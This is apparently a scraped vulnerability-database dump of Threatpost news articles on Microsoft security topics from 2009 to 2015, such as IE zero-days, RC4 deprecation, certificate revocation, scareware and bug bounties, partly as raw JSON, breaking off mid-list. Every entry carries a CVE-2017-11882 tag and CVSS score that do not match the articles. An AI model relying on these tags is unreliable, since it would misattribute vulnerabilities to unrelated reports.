That vulnerability was discovered as part of the Mobile Pwn2Own contest in November and ZDI disclosed it to Microsoft at the time. ZDI has a policy of disclosing privately reported vulnerabilities after 120 days, even if the affected vendor has not released a patch. Microsoft has not issued patches for any of the four vulnerabilities disclosed by ZDI this week.

Among the other vulnerabilities the company disclosed is a flaw in how IE handles some objects.

“The specific flaw exists within the handling of CAttrArray objects.
By manipulating a document’s elements an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process,” the [advisory](<http://www.zerodayinitiative.com/advisories/ZDI-15-360/>) says.

The other two vulnerabilities are similar, in that they involve IE mishandling certain objects. IE will in some circumstances mishandle CTreePos and CCurrentStyle objects, leading to a dangling pointer that an attacker can reuse.

_This story was updated on July 23 to add context about the flaws only affecting IE Mobile and the comment from Microsoft._

_Image from Flickr photos of [C_osett](<https://www.flickr.com/photos/mstable/>)._

Four Zero Days Disclosed in Internet Explorer
2015-07-23T09:14:36
ID THREATPOST:59C4483705849ADA19D341EFA462DD19 Type threatpost Modified 2015-07-28T14:23:41
https://threatpost.com/four-zero-days-disclosed-in-internet-explorer/113911/
CVE-2017-11882 CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE)

Last seen 2018-10-06T22:58:50
Description
Microsoft didn’t beat around the bush when it [warned customers to stay away from the deprecated RC4 algorithm](<http://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) last fall.
Now it’s giving those who use its .NET software framework an option to disable the cipher in Transport Layer Security (TLS) as well.

In a security advisory issued on its [Security TechCenter](<https://technet.microsoft.com/en-us/library/security/2960358>) yesterday, echoing its stance last year, Microsoft pointed out that using RC4 in TLS can give an attacker the ability to perform man-in-the-middle attacks and siphon away plaintext from encrypted sessions.

[In November, Microsoft gave](<http://blogs.technet.com/b/srd/archive/2013/11/12/security-advisory-2868725-recommendation-to-disable-rc4.aspx>) those using Windows 7, Windows 8, Windows RT, Server 2008 R2, and Server 2012 the ability to disable the troublesome cipher. Now, six months later, the company is letting anyone running the latest version of .NET do the same, by modifying the system registry. While .NET users looking to download the updates can find them at Microsoft’s Download Center and Microsoft’s Update Catalog, it’s keeping the update off of Windows Update “in order to give customers the ability to plan and test the new settings for disabling RC4 prior to implementation in their environments.”

RC4’s faults have been well-documented. Now a quarter century old, the cipher is one of the older algorithms in use across the Internet today. With its usage has come an influx of practical attacks, many that can recover plaintext. [One such attack](<http://threatpost.com/attack-exploits-weakness-rc4-cipher-decrypt-user-sessions-031413/77628>), dug up last year by researcher and University of Illinois at Chicago professor Daniel J.
Bernstein enabled an attacker to fully compromise a victim’s session that’s protected by TLS/RC4.

The advisory was one of three Microsoft issued yesterday.

[The second](<https://technet.microsoft.com/en-us/library/security/2871997.aspx>) informed users that the company has tweaked a handful of its operating systems to better protect credentials and domain authentication controls. Updates to Windows 8, Windows RT, Server 2012, Windows 7, and Server 2008 R2 will now enforce stricter authentication policies. Microsoft is doing this by adding an extra layer of security to Local Security Authority (LSA), the interface that logs users onto local systems. The update also adds a new admin mode for its Credential Security Support Provider (CredSSP), a protocol that lets programs use client-side Security Support Provider APIs to assign user credentials from client computers to target servers. The update to CredSSP should prevent credentials from being harvested if the client ever winds up connecting to a compromised server.

Microsoft points out that while the updates should be beneficial for anyone running the aforementioned systems, they’ll be most useful in enterprise environments where Windows domains are deployed.

In [the last advisory](<https://technet.microsoft.com/library/security/2962824>) Microsoft gave users a heads up that it went ahead and revoked the digital signatures for four third-party Unified Extensible Firmware Interface (UEFI) modules yesterday. The advisory is a bit vague, but claims the unnamed modules, which could be loaded during a Secure Boot, were not in compliance with the company’s certification program.
As the modules were private and third-party, not a whole lot more information was given but Microsoft claims the move was part of its “ongoing efforts to protect customers.”

All advisories of course come on the heels of [yesterday’s Patch Tuesday updates](<http://threatpost.com/microsoft-adobe-issue-critical-fixes-for-may-2014-patch-tuesday/106062>). The update addressed 13 issues, including critical vulnerabilities in IE and its Sharepoint Server software.

Microsoft Giving .NET Users The Option to Shed RC4
2014-05-14T13:21:35
ID THREATPOST:ED7B090DD1289553529F8B6FD87BF467 Type threatpost Modified 2014-05-14T17:21:35
https://threatpost.com/microsoft-giving-net-users-the-option-to-shed-rc4/106083/
CVE-2017-11882 CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE)

Last seen 2018-10-06T23:02:39
Description
**UPDATED**–In the wake of the [Flame malware](<https://threatpost.com/what-have-we-learned-flame-malware-061512/>) attack, which involved the use of a fraudulent Microsoft digital certificate, the software giant has reviewed its certificates and found nearly 30 that aren’t as secure as the company would like and has revoked them. Microsoft also released its new updater for certificates as a critical update for Windows Vista and later versions as part of today’s July Patch Tuesday.

Microsoft has not said exactly what the now-untrusted certificates were used for, but company officials said there were a total of 28 certificates affected by the move. Many of the [affected certificates](<http://technet.microsoft.com/en-us/security/advisory/2728973>) are listed simply as “Microsoft Online Svcs”.
However, the company said that it was confident that none of them had been compromised or used maliciously. The move to revoke trust in these certificates is a direct result of the investigation into the Flame malware and how the attackers were able to forge a Microsoft certificate and then use it to impersonate a Windows Update server.

“As a continuation of this effort, we reviewed a number of Microsoft digital certificates and found several which do not meet our standards for security practices. As an extra precautionary measure, we released [Security Advisory 2728973](<http://cmstechnet.redmond.corp.microsoft.com/en-us/security/advisory/2728973>) today to announce the availability of a Critical, non-security update that moves several of these certificates into the Untrusted Certificate Store. None of the certificates involved are known to have been breached, compromised, or otherwise misused. This is a pre-emptive cleanup to ensure a high bar for any certificates owned by Microsoft,” Gerardo Di Giacomo and Jonathan Ness of the Microsoft Security Response Center wrote in an explanation of the change.

During the analysis of the Flame malware, researchers discovered that one of the unique features of the worm was its use of a [forged Microsoft certificate](<https://threatpost.com/flame-malware-uses-forged-microsoft-certificate-validate-components-060412/>). The attackers used that certificate to set up a seemingly valid Windows Update server inside an infected organization and then have clients connect to the server, ostensibly for Microsoft updates, and then install the Flame malware on those machines.

That episode led to several changes in the way that Microsoft handles certificates, and the revocation of trust in several of its own certificates is one of the more dramatic results.
Several weeks ago the company also announced that it would be releasing a mechanism for Windows that would automatically update the status of certificates in the certificate store. That was released as an optional update for Windows, but today Microsoft changed that to a critical, non-security update, which will install it automatically on many machines.

“This new feature provides dynamic updates, allowing Windows clients to be updated with untrusted certificates once per day without requiring user interaction,” Di Giacomo and Ness wrote.

_This story was updated on July 10 to add the number of certificates marked as untrusted._

Microsoft Revokes Trust in 28 of Its Own Certificates
2012-07-10T18:30:16
ID THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0 Type threatpost Modified 2013-04-17T16:31:53
https://threatpost.com/microsoft-revokes-trust-28-its-own-certificates-071012/76784/
CVE-2017-11882 CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE)

Last seen 2018-10-06T23:06:31
Description
Microsoft has pushed out a new release candidate of Internet Explorer 9 that includes two new privacy protections designed to enable consumers to prevent tracking by some Web sites.

The new [IE 9 release candidate](<http://blogs.msdn.com/b/ie/archive/2010/12/07/ie9-and-privacy-introducing-tracking-protection-v8.aspx>) has two separate, but related, technologies aimed at giving users more control over how sites track them and what data is sent back to the site’s owners: Tracking Protection and Tracking Protection Lists.
The functionality allows users to specify exactly which sites they will allow to track them to some extent and enables sites to publish lists that show consumers what information might be collected.

The announcement by Microsoft comes in the midst of a complex discussion among lawmakers, regulators and privacy advocates about whether a national “Do-Not Track” list for browsers is desirable or even feasible. The [Federal Trade Commission recently proposed such a list](<https://threatpost.com/ftc-pushes-do-not-track-option-web-browsers-120110/>) in a report it released on privacy issues. Microsoft officials said that they were interested in finding a way to answer some of the same questions raised by the FTC.

“We believe that the combination of consumer opt-in, an open platform for publishing of Tracking Protection Lists (TPLs), and the underlying technology mechanism for Tracking Protection offer new options and a good balance between empowering consumers and online industry needs. They further empower consumers and complement many of the other ideas under discussion,” Dean Hachamovitch, corporate vice president for IE at Microsoft, wrote in a blog post about the new features. “While ‘Do not track’ is a meaningful consumer promise around data use, the web lacks a good precise definition of [what tracking means](<http://www.research-live.com/ftc-chief-says-do-not-track-idea-is-still-on-the-table/4003244.article>). Until we get there, we can make progress by providing consumers with a way to limit or control the data collected about them on sites they don’t visit directly. That kind of control is already technically feasible today [in a variety of ways](<http://blogs.msdn.com/b/ie/archive/2010/11/30/selectively-filtering-content-in-web-browsers.aspx>). It is important to understand that the feature design makes no judgment about how information might be used.
Rather, it provides the means for consumers to opt-out of the release of that information in the first place.”

The new privacy mechanisms in IE 9 will be opt-in, so users will need to make conscious decisions about what sites they are blocking and which they are allowing to track them. Users will be able to manually add specific sites to the Tracking Protection mechanism and also can add Tracking Protection Lists published by various Web sites to their browsers. The TPLs will include URLs that the user only wants IE to call out to if the user actually types the address into the browser or clicks on a link to the site.

“In addition to ‘Do Not Call’ entries that prevent information requests to some web addresses, lists can include ‘OK to Call’ entries that permit calls to specific addresses. In this way, a consumer can make exceptions to restrictions on one list easily by adding another list that includes ‘OK to Call’ overrides for particular addresses,” Hachamovitch wrote.
“We designed this feature so that consumers have a clear, straightforward, opt-in mechanism to enable a higher degree of control over sharing their browsing information AND websites can provide easy to use lists to manage their privacy as well as experience full-featured sites.”

Microsoft Adds Tracking Protection to IE 9
2010-12-07T20:00:18
ID THREATPOST:5B1F1A9A61354738E396D81C42C0E897 Type threatpost Modified 2013-04-17T16:35:34
https://threatpost.com/microsoft-adds-tracking-protection-ie-9-120710/74747/
CVE-2017-11882 CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE)

Last seen 2018-10-06T23:06:15
Description
We’ve noted for a while that the practices of rogue antivirus software have started to mimic those of legitimate antivirus software vendors. But a new version of FakeXPA scareware takes things a bit further: posing as a legitimate commercial AV package, AVG Antivirus 2011.

Microsoft’s Malware Protection Center [issued a warning for the phony AVG program on Monday](<http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=AVGAntivirus2011>), noting that the application is standard issue scareware that claims to scan for malware, displays fake ‘detection’ warnings about infections, then asks for money to remove the non-existent malware. Like other scareware, FakeXPA is known, in cases, to install its own malware – variants of the Alureon Trojan horse program.

Screen shots of the FakeXPA malware show a legitimate-seeming GUI with the AVG Anti Virus logo prominently displayed.
AVG Antivirus 2011 is one of many names used by the malware, with small variations in branding and user interface distinguishing each.

Rogue anti virus has blossomed into a multi million dollar business in the last decade using aggressive promotion techniques like search engine optimization and web-based pop-up ads to trick unwitting Web surfers into downloading their scareware.

Co-opting a legitimate product’s name and logo is just the latest in a series of steps by rogue anti malware vendors to mirror the features and actions of legitimate anti virus software makers. In addition, fake AV firms have also introduced services like localization, [online customer support](<https://threatpost.com/pulling-back-curtain-rogue-av-tech-support-071210/>) (with real humans!) and even [AV-Test like product benchmarking](<https://threatpost.com/rise-rogue-av-testers-070910/>) to serve their “customers” and increase profits.

Fake AVG: Scam Software Cops Name and Logo of Real AV
2011-02-01T20:37:43
ID THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F Type threatpost Modified 2013-04-17T16:35:15
https://threatpost.com/fake-avg-scam-software-cops-name-and-logo-real-av-020111/74899/
CVE-2017-11882 CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE)

Last seen 2018-10-06T22:56:10
Description
Microsoft’s monthly release of security bulletins today is a relatively light load of patches to be tested and deployed.
The real news, however, could be in a separate advisory in which it continues to deprecate the outdated RC4 encryption algorithm.

Following its initial advisory in May that applied to the .NET framework, today’s move [extends RC4 deprecation](<https://support.microsoft.com/en-us/kb/2978675>) to Windows 10 systems that are running .NET Framework 3.5 applications and systems with .NET Framework 4.6 installed that are running .NET Framework 4.5/4.5.1/4.5.2 applications.

The advisory also updates the default transport encryption in Windows to TLS 1.2.

The move is timely as the industry continues to move away from weakened encryption. For example, a recent academic paper projects that the time to arrive at a [practical SHA-1 collision attack](<https://threatpost.com/practical-sha-1-collision-months-not-years-away/114979/>) can now be measured in months, not years. Continuous improvements to processing speeds and availability and tweaks to existing attacks put weak encryption within reach of well-funded criminal or state-sponsored operations.

As for today’s half-dozen security bulletins, Microsoft has rated three of them as critical, including the ubiquitous Internet Explorer rollup and patches for remote code execution vulnerabilities in the VBScript and Jscript engines in Windows.

Four vulnerabilities are addressed in [MS15-108](<https://technet.microsoft.com/en-us/library/security/MS15-108>), none of which have been publicly disclosed; Microsoft said it is also not aware of public exploits.

Microsoft said attackers could host an exploit online or phish users with a malicious ActiveX control embedded in an Office document that uses the Internet Explorer rendering engine to redirect users to the malicious website.

The vulnerabilities affect Vista, Windows Server 2008 and Server Core installations of Windows Server 2008 R2.
Today’s update patches two separate scripting engine memory corruption vulnerabilities, an information disclosure flaw and an ASLR bypass.

“The update addresses the vulnerabilities by modifying how the VBScript and JScript scripting engines handle objects in memory, and helping to ensure that affected versions of VBScript properly implement the ASLR security feature,” Microsoft said in its advisory.

“With the number of JScript and VBscript related vulnerabilities addressed this month, Microsoft needs to adopt a disabled by default strategy with those technologies until they can be removed entirely,” said Core Security systems engineer Bobby Kuzma. “Unfortunately that will never happen, due to the huge legacy application technical debt held by large organizations and governments worldwide.”

Microsoft also patched 14 vulnerabilities in Internet Explorer and two more in the Microsoft Edge browser for Windows 10 systems.

Most of the IE update addresses memory corruption vulnerabilities in [MS15-106](<https://technet.microsoft.com/library/security/MS15-106>) along with a handful of privilege elevation and information disclosure flaws. There is also some overlap with the VBScript and Jscript bulletin, since IE is the principal attack vector there.
One of the IE bugs, reported by researchers at FireEye, has been publicly disclosed, but none of the flaws have been exploited in the wild, Microsoft said.

The Microsoft Edge bulletin, [MS15-107](<https://technet.microsoft.com/library/security/MS15-107>), is rated moderate and takes care of a vulnerability that enables bypass of the browser’s cross-site scripting filter, and a separate information disclosure vulnerability.

The remaining critical bulletin patches a remote code execution vulnerability in Windows Shell.

“The vulnerabilities could allow remote code execution if a user opens a specially crafted toolbar object in Windows or an attacker convinces a user to view specially crafted content online,” Microsoft said in advisory [MS15-109](<https://technet.microsoft.com/library/security/MS15-109>).

The remaining bulletins are rated important by Microsoft.

[MS15-110](<https://technet.microsoft.com/library/security/MS15-110>) patches three remote code execution vulnerabilities in Microsoft Office, all of which are memory corruption flaws, while [MS15-111](<https://technet.microsoft.com/library/security/MS15-111>) is a Windows kernel update that patches five vulnerabilities, including three different privilege elevation flaws, a memory corruption issue, and a Trusted Boot bypass.

October 2015 Microsoft Patch Tuesday Security Bulletins
2015-10-13T14:39:57
ID THREATPOST:5083983BB9656C8F9FD41E7297B634C9 Type threatpost Modified 2015-10-14T20:03:27
https://threatpost.com/microsoft-releases-six-bulletins-continues-rc4-deprecation/115017/
CVE-2017-11882 CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE)

Last seen 2018-10-06T23:00:56
Description
Microsoft is ready to officially declare network worms passé for the enterprise.
In its latest [Security Intelligence Report](<http://www.microsoft.com/security/sir/default.aspx>), released Wednesday, Microsoft said that risks posed by Web-based threats to large, distributed network environments have surpassed malware such as Conficker.

The report is based on data collected from more than one billion endpoints in more than 100 countries by the company’s Malicious Software Removal Tool, Hotmail accounts and Windows Defender users, said Holly Stewart, senior program manager for Microsoft’s Malware Protection Center.

For years, Microsoft has considered Conficker the benchmark of network-based malware. The worm first popped up in 2008 and paved the way for other credential-stealing malware. Now that’s changed, Stewart said.

“Conficker has been thought of as the sentinel of infiltration,” Stewart said. “It has not changed in years. It spreads using an old vulnerability. It steals passwords and uses USB drives and shared drives to move on the network. It’s been tracked as a beacon of things within the network when things are not quite right.”

[Conficker](<http://threatpost.com/en_us/blogs/conficker-working-group-efforts-fight-botnet-mixed-bag-012511>) is more of a chameleon, constantly changing propagation methods and malware techniques. The worm emerged in November 2008 and attacked a Windows vulnerability to steal passwords and build one of the more formidable botnets ever recorded, reaching a peak of 12 million bots in 2009 according to some estimates. But as enterprises in particular shore up their security efforts, [Conficker infections](<https://threatpost.com/en_us/blogs/conficker-worm-continues-evolve-confound-researchers-032009>) are dwindling noticeably, Microsoft said.
The drop coincides with a number of factors, including increased password vigilance and a policy decision by Microsoft to disable its Autorun functionality by default starting with Windows XP and Vista in 2011.

“Conficker started to decline in Q2 2011. If you look at two other worms, Autorun and Rimecud, both used the same propagation method and both had serious declines (37 percent and 69 percent respectively),” Stewart said. “Certainly there’s a correlation of the amount of threats we saw in the enterprise; it seems to indicate the decision had some impact.”

[Autorun malware](<http://threatpost.com/en_us/blogs/infections-will-not-die-conficker-and-autorun-011712>) spreads via removable media and generally drops backdoors that enable additional malware infections such as keyloggers that steal credentials and other personal data. Rimecud is similar malware in that it propagates via USB drives and instant messenger applications. Its payload includes backdoor connections to remote servers, and additional malware is installed from third-party servers and peer-to-peer networks.

Naturally, however, enterprises aren’t out of the woods now that network worms have tailed off. Web-based threats have been a growing threat for years as hackers exploit common input-validation vulnerabilities with automated SQL injection attacks or cross-site scripting attacks that enable them to remotely control vulnerable browsers. Users are redirected to sites hosting malicious content and are infected with more malware, or are lured to an attacker-controlled site via social engineering (phishing, spam, typo-squatting) and tricked into entering legitimate credentials. The result has been a spike in Web-based attacks, in particular iFrame Redirects.

The Microsoft SIR said that seven of the top 10 threats it detects involve some sort of malicious website or compromised Web content, and two of those seven are iFrame-redirection attacks.
Stewart said 3.3 million iFrame redirections were detected, a five-fold increase.

“It’s a really big shift in what we’re seeing as top threats for the enterprise,” Stewart said. “Malicious iFrame redirection is a middle man in these Web-based attacks; it’s that little component where the user is exposed to malicious content.”

Hackers have been able to automate scans for sites vulnerable to attacks such as SQL injection. A targeted Google search, for example, will render a detailed and sizeable list of Web servers vulnerable to any number of attacks. IFrame attacks are effective because the code is not obvious to the user or even the Web administrator, because the attacker isn’t adding a page to the vulnerable server, defacing a page or adding malware, just a redirector, Stewart said.

“The iFrame exposes visitors to bad stuff that the attacker is hosting somewhere else,” Stewart said. “It’s a piece in the chain of a Web-based delivery system.”

IFrame attacks are not alone.
Other threats such as Zbot, or the Zeus Trojan, the Blacole Trojan and keygen programs that generate product keys used to validate pirated software climbed the charts, Microsoft said.

“Enterprise customers are much more exposed than ever to malicious Web content,” Stewart said.

Move Over Conficker, Web Threats are Top Enterprise Risk
2013-04-18T11:11:17
ID THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA Type threatpost Modified 2013-04-22T20:47:19
https://threatpost.com/move-over-conficker-web-threats-are-top-enterprise-risk/99762/
CVE-2017-11882 CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE)

Last seen 2018-10-06T23:10:32
Description
On the Microsoft Secure Windows Initiative blog, software engineer Chengyun discusses the default behaviour of ActiveX controls embedded in Office documents. The software giant also provides information on how an attacker can abuse ActiveX and how Office users can change the behavior of ActiveX controls embedded in Office documents.

From [the article](<http://blogs.technet.com/srd/archive/2009/03/03/behavior-of-activex-controls-embedded-in-office-documents.aspx>):

Attackers have discovered ActiveX support in Office applications and have been using it to more effectively lure victims to web-based malware. They have recently used the “Microsoft Scriptlet Component” to navigate victims to a website exploiting a patched Internet Explorer vulnerability (CVE-2009-0075, fixed by [security bulletin MS09-002](<http://www.microsoft.com/technet/security/bulletin/ms09-002.mspx>)).
Seems like attackers have discovered it is easier to trick a user to open a Word document attached to email compared to luring a user to click a dubious-looking link.\n\nChengyun also provides step-by-step instructions on configuring Office 2007 for users concerned about Safe-for-Initialization ActiveX controls being instantiated by Office without prompt.\n\nFor more on this type of attack, [check this entry](<http://blog.trendmicro.com/another-exploit-targets-ie7-bug/>) at Trend Micro\u2019s malware blog.\n", "cvss3": {}, "published": "2009-03-04T14:51:09", "type": "threatpost", "title": "Microsoft explains how ActiveX in Office is abused by attackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:38", "id": "THREATPOST:6968030EBEDCF665121F267E466D3BA5", "href": "https://threatpost.com/microsoft-explains-how-activex-office-abused-attackers-030409/72366/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:55", "description": "Scheduled patch deliveries are so last decade\u2014and thankfully, it looks like they\u2019re over when it comes to [Microsoft Patch Tuesday](<https://threatpost.com/creaking-patch-tuesdays-viability-rests-with-quality-speed/110941>).\n\nMicrosoft this week at its Ignite event introduced its new security update scheme called [Windows Update for Business](<http://blogs.windows.com/bloggingwindows/2015/05/04/announcing-windows-update-for-business/>), which debuts in Windows 10 with several new features that help IT departments take better control of patch deployments and prioritization. 
For consumers and businesses not running Windows Pro or Windows Enterprise devices where the service is free, the second-Tuesday-of-every-month procession of updates is over.\n\n\u201cWe\u2019re not going to be delivering all of these updates to all of these consumers on one day of the month,\u201d said Terry Myerson, executive vice president of operating systems at Microsoft.\n\nAnd with that declaration, Patch Tuesday\u2019s 12-year run is essentially done. Companies that have structured all-hands-on-deck patch rollouts will now get patches\u2014and new functionality features\u2014as they\u2019re available. Windows of exposure to attacks against unpatched vulnerabilities close a little tighter. The applause given to Myerson during his keynote at Ignite was likely echoed in server rooms worldwide.\n\nFor Windows Update for Business users, patch rollouts will look different. Distribution rings allow Windows admins to designate which machines get updates on a quicker cycle\u2014think remote offices and workers. Admins can also designate maintenance windows for certain machines, and integrate the update mechanism into existing system management tools.\n\n\u201cConsumers will want to be on one of the faster-moving tiers. They may not want to be part of the \u2018ludicrous\u2019 tier, but these users will want faster adoption of new features and user experience changes,\u201d said Chris Goettl of Shavlik, a longtime patch management firm. \u201cWith this change, businesses will actually be able to take advantage of all tiers. An IT organization with a desire to vet out new updates before they reach the bulk of their user base can put a test group on the \u2018ludicrous\u2019 tier. 
That way they can get a feel for the changes coming, the stability of those changes and potentially block any of those updates that have a negative effect.\u201d\n\nMicrosoft said it will offer what it\u2019s calling Long Term Servicing Branches, which offer only security updates to machines on that tier, similar to Patch Tuesday updates as currently structured.\n\n\u201cWith these changes, the power of Patch Tuesday will diminish rapidly,\u201d Goettl said.\n\nIt\u2019s no secret Microsoft has had an interesting few months with regard to patching. First there was an internal restructuring under new CEO Satya Nadella that resulted in 2,100 layoffs and the integration of the [Trustworthy Computing group](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) into Microsoft\u2019s enterprise and cloud computing organizations. In the subsequent months since the September 2014 shakeup, [patch quality](<https://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385>) has been an issue with a couple of important fixes pulled back, and other publicly disclosed and exploited vulnerabilities sitting unpatched for a nerve-racking period of time. And not to mention, Microsoft\u2019s decision to discontinue [Advanced Notification of patches](<https://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294>) on the Thursday prior to Patch Tuesday, leaving it available only to premier support customers.\n\nNow that the dust has settled in Redmond, it\u2019s clear that the plan was to give Patch Tuesday a facelift. For consumers who are indifferent about security updates, this assures a fleet of devices running at current patch levels on a timely basis. For businesses, more choice and control is always welcome.\n\n\u201cSome people want the software right after it finishes our testing,\u201d Microsoft\u2019s Myerson said. \u201cThey don\u2019t want to wait a second. 
Then we have people step back and say they\u2019ll wait until we work out the kinks, make sure there are no compatibility issues, no functionality issues. Great, we let the user choose. With this, we have confidence that we have the highest quality patches testing them with an incredibly broad population.\u201d\n\nSlow-moving enterprises, meanwhile, are likely to stick to their current change and configuration management processes for the time being. Some companies just cannot afford the downtime and reliability issues caused by a patch breaking other applications, or updates requiring a reboot to take effect during business hours.\n\n\u201cImagine the referential integrity issues with some machines accepting patches and others not based on reboots, when services can be restarted, or even if they are offline,\u201d said Morey Haber, vice president of technology at Beyond Trust. \u201cBusinesses would no longer have a controlled baseline to measure against when patches are being streamed versus a firm bulk release by date.\u201d\n\nHowever, with the speed at which vulnerabilities are being found by white and black hats\u2014and disclosed\u2014organizations can no longer afford to sit tight for three to four weeks, or months, waiting for a patch. The speed at which attacks are folded into exploit kits should give pause to any critic of automatic rollouts.\n\n\u201cLarge enterprises are always slower moving to the adoption of new concepts and risk, especially with IT. The argument for the other side is what if I could cut a third of my patching costs if I don\u2019t have to patch all the time?\u201d Andrew Storms, VP of security services at New Context, told Threatpost in February. \u201cIf I were a CIO, I would be drooling.\u201d\n\nMicrosoft would not answer questions for this article, and instead provided this statement: \u201cWindows Update for Business can take responsibility for the timely distribution of security updates for customers for free. 
Customers that choose to distribute updates themselves will continue to receive the updates on the second Tuesday of the month.\u201d\n\n_This article was updated to include a comment from Microsoft._\n", "cvss3": {}, "published": "2015-05-06T13:10:24", "type": "threatpost", "title": "Windows Update for Business Uproots Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-08T19:58:48", "id": "THREATPOST:580280FBECF50DF8FF68F3A998F311D3", "href": "https://threatpost.com/patch-tuesday-facelift-end-of-an-era/112640/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:48", "description": "Database Management Systems (DBMS) have extended their capabilities far beyond simply serving as data storage and query systems. Contrary to what they were in the 1970\n", "cvss3": {}, "published": "2010-10-18T19:49:08", "type": "threatpost", "title": "How to Minimize Your Database Attack Surface", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:19:32", "id": "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "href": "https://threatpost.com/how-to-minimize-your-database-attack-surface/74583/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:06", "description": "Microsoft had always rejected the possibility of a [full-scale bug bounty](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>), relying instead on solid relationships it spent the better part of a decade fostering with researchers worldwide who submit vulnerabilities to the Microsoft Security Research Center (MSRC).\n\nYet in the past couple of years, the company has bent a bit in the other direction, instituting reward programs for researchers who develop new bypasses for exploit mitigations, or defensive 
techniques that can be folded into Microsoft products.\n\nThe company has already paid out several hundred thousand dollars to researchers who have successfully [beaten exploit mitigations in Windows](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>), including ASLR, DEP, SEHOP and more, as well as rewarding one researcher $200,000 for a new technique to [defend against return-oriented programming (ROP) attacks](<https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712>).\n\nIndividual vulnerability payouts have been off the board for the most part (Microsoft did institute a [temporary bounty for Internet Explorer 11](<http://threatpost.com/researchers-nab-28k-in-microsoft-bug-bounty-program/102535>) in the summer of 2013), until today when Microsoft launched the [Microsoft Online Services Bug Bounty Program](<http://technet.microsoft.com/en-us/security/dn800983>). Bounties start at $500, and vulnerabilities in cloud-based services such as Office 365 are the first eligible in the program, Microsoft said.\n\n\u201cGenerally, bounties will be paid for significant web application vulnerabilities found in eligible online service domains,\u201d Microsoft said in a statement announcing the program, adding that researchers must also submit concise steps that will allow Microsoft engineers to reproduce the vulnerability.\n\nOnly certain domains are eligible, Microsoft said. 
That list includes:\n\n * portal.office.com\n * *.outlook.com (Office 365 for business email services applications, excluding any consumer \u201coutlook.com\u201d services)\n * outlook.office365.com\n * login.microsoftonline.com\n * *.sharepoint.com\n * *.lync.com\n * *.officeapps.live.com\n * www.yammer.com\n * api.yammer.com\n * adminwebservice.microsoftonline.com\n * provisioningapi.microsoftonline.com\n * graph.windows.net\n\nOnly certain vulnerability classes are eligible as well, including cross-site scripting, cross-site request forgery, insecure direct object references, injection and authentication flaws, server-side code execution, privilege escalation, security configuration issues and cross-tenant data tampering or access eligible in multitenant services, Microsoft said.\n\n\u201cThe aim of the bug bounty is to uncover significant vulnerabilities that have a direct and demonstrable impact to the security of our users and our users\u2019 data,\u201d Microsoft said.\n\nMicrosoft also listed a number of vulnerabilities that are ineligible; those include:\n\n * Missing HTTP Security Headers (such as X-FRAME-OPTIONS) or cookie security flags (such as \u201chttponly\u201d)\n * Server-side information disclosure such as IPs, server names and most stack traces\n * Bugs in the web application that only affect unsupported browsers and plugins\n * Bugs used to enumerate or confirm the existence of users or tenants\n * Bugs requiring unlikely user actions\n * URL Redirects (unless combined with another flaw to produce a more severe vulnerability)\n * Vulnerabilities in platform technologies that are not unique to the online services in question (Apache or IIS vulnerabilities, for example.)\n * \u201cCross Site Scripting\u201d bugs in SharePoint that require \u201cDesigner\u201d or higher privileges in the target\u2019s tenant.\n * Low impact CSRF bugs (such as logoff)\n * Denial of Service issues\n * Cookie replay vulnerabilities\n\nMicrosoft also made it clear 
